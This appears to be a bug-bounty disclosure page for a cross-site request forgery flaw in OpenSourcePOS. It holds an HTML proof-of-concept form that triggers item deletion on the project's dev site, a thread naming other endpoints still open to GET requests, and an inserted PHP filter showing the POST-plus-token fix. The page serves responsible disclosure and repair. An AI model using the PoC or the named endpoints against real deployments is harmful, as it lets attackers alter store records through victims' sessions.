Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos

Valid

Reported on

Oct 4th 2021


Description

You have not set any CSRF protection for the receivings/delete_item/{item_id} endpoint.

Proof of Concept

//PoC.html

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://dev.opensourcepos.org/receivings/delete_item/1">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

We have contacted a member of the opensourcepos team and are waiting to hear back a year ago
jekkos
a year ago

Maintainer


The fix should include this protection. The method is POST only now.

jekkos
a year ago

Maintainer


https://github.com/opensourcepos/opensourcepos/blob/e8f27f547b061b88ed78232e75e859bdf7ebcd6b/application/hooks/method_hook.php#L8
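
As an added example (not OSPOS code and not the commit linked above), the PHP filter below shows the two checks this thread turns on: a state-changing route must refuse anything but POST, and the POST must carry a valid CSRF token, since a token check that only runs on POST never sees a GET route like the one in the PoC. The route list, the csrf_token field name and the session token handling are assumptions made for this illustration.

```php
<?php
// Added example (not OSPOS code): a pre-controller filter in the spirit of the linked method_hook.php fix.
// Route list, token field name and session handling are assumptions for this demonstration.
const STATE_CHANGING_ROUTES = ['receivings/delete_item', 'receivings/complete', 'sales/complete'];

// Returns null when the request may proceed, otherwise the HTTP status to answer with:
// 405 for a non-POST method, 403 for a missing or wrong CSRF token.
function check_state_changing_request(string $method, string $uri, array $post, string $session_token): ?int
{
    $path = ltrim((string) parse_url($uri, PHP_URL_PATH), '/');
    $is_state_changing = false;
    foreach (STATE_CHANGING_ROUTES as $route) {
        // Match the bare route or the route followed by a parameter such as /1.
        if ($path === $route || strpos($path, $route . '/') === 0) {
            $is_state_changing = true;
            break;
        }
    }
    if (!$is_state_changing) {
        return null; // read-only route: nothing to enforce
    }

    // A link, image tag or plain cross-site form arrives as GET. Refusing it closes the
    // vector in the PoC, and a CSRF token check that runs only on POST now covers this route.
    if (strtoupper($method) !== 'POST') {
        return 405;
    }

    // Compare the submitted token with the session copy in constant time.
    $submitted = (string) ($post['csrf_token'] ?? '');
    if ($submitted === '' || !hash_equals($session_token, $submitted)) {
        return 403;
    }
    return null;
}

// Constructed requests: the PoC's GET, a token-less cross-site POST, a legitimate
// POST carrying the session token, and an unrelated read-only GET.
$token = bin2hex(random_bytes(16));
$requests = [
    ['GET',  '/receivings/delete_item/1', []],
    ['POST', '/receivings/delete_item/1', []],
    ['POST', '/receivings/delete_item/1', ['csrf_token' => $token]],
    ['GET',  '/items/search?q=widget', []],
];
foreach ($requests as [$method, $uri, $post]) {
    $verdict = check_state_changing_request($method, $uri, $post, $token);
    printf("%-4s %-27s -> %s\n", $method, $uri, $verdict === null ? 'allowed' : "rejected ($verdict)");
}
```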

amammad
a year ago

Researcher


I tested this on dev.opensourcepos.org.

Is this instance still vulnerable?

amammad
a year ago

Researcher


I tested this endpoint and it still uses GET:

/sales/complete

and is vulnerable to CSRF.

jekkos
a year ago

Maintainer


It might have another build deployed now.

jekkos
a year ago

Maintainer


I'm redeploying... you can retry in 10 mins.

amammad
a year ago

Researcher


As I said, I tested again just now and this endpoint is still vulnerable to CSRF:

/receivings/complete

because it accepts the GET method besides POST.

amammad
a year ago

Researcher


I tested receivings/delete_item/{id} and it is OK, jekkos.

a year ago

Maintainer


OK great thanks!

opensourcepos/opensourcepos maintainer validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos marked this as fixed with commit e8f27f a year ago
jekkos has been awarded the fix bounty
This vulnerability will not receive a CVE